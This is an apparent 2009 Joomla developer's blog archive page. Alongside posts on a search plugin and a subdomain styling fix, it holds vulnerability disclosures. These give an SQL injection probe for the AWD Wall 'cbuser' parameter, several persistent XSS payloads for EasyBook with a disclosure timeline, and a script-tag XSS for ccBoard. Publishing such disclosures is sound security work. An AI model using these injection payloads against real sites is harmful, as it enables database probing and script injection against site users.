Saturday, 24 October 2009 14:32

Not too long ago a client of mine wanted to have entries from JS Jobs show up in the general Joomla search results. I went ahead and wrote up this quick and dirty search plugin for JS Jobs.

Last Updated on Monday, 07 December 2009 05:13
Friday, 16 October 2009 00:19

The Joomla component AWD Wall 1.5 suffers from an SQL Injection vulnerability in its handling of the 'cbuser' parameter.

?option=com_awdwall&view=awdwall&cbuser=62 and 1=1 limit 1 -- '
?option=com_awdwall&view=awdwall&cbuser=62 and 1=2 limit 1 -- '
Last Updated on Friday, 16 October 2009 00:27
Thursday, 24 September 2009 18:24

While working on a Joomla! site lately, I had an interesting issue arise. None of my scripts or CSS styles would load on a Joomla site installed on a subdomain. Luckily I was able to solve this quickly.

Thursday, 17 September 2009 00:00

The Joomla component EasyBook 2.0.0rc4 suffers from multiple persistent XSS vulnerabilities. One seems fairly critical, while the others would take some incredible creativity to actively exploit.

  1. BBCode XSS

    Settings:

    • Allow BBCode - on (default)
    • Allow Pictures - on (not default)
    [img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
  2. Website URL XSS

    Settings:

    • Show web site field: Show (default)
    foo.com" onmouseover="alert(String.fromCharCode(88,83,83));return false;

    Requires minimal user interaction

  3. Skype/Yahoo Username XSS

    Very narrow scope, as entries are truncated. XSS still technically possible. Requires user interaction.

    ' onclick="alert('XSS')"
  4. AIM/MSN Username XSS

    Again, narrow scope. See 3.

    " onclick="alert('xss')"

    ICQ username is similar, but scope seems too narrow to exploit.

Timeline

  • Vulnerabilities Discovered: 10 July 2009
  • Vendor Notified: 10 July 2009
  • Vendor Response: 13 July 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:37
Thursday, 17 September 2009 00:00

The Joomla component ccBoard 1.1-RC suffers from a Cross Site Scripting vulnerability if certain conditions are met. The forum must be set up to use the internal HTML editor and not bbCode. This is the default setting upon install.

To execute, simply post a new message. Either toggle the editor to 'off' or use the HTML Source editing button, insert your JavaScript, and submit!

<script>alert('xss');</script>

The editor was even nice enough to make my XSS injection pretty upon saving:

<script type="text/javascript">// <![CDATA[
alert('xss');
// ]]></script>
Last Updated on Wednesday, 04 November 2009 22:20
Page 10 of 16

Featured Extensions

$1.00
FREE
You Save: $1.00
$3.00
FREE
You Save: $3.00
$1.00
FREE
You Save: $1.00
$3.00
FREE
You Save: $3.00

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions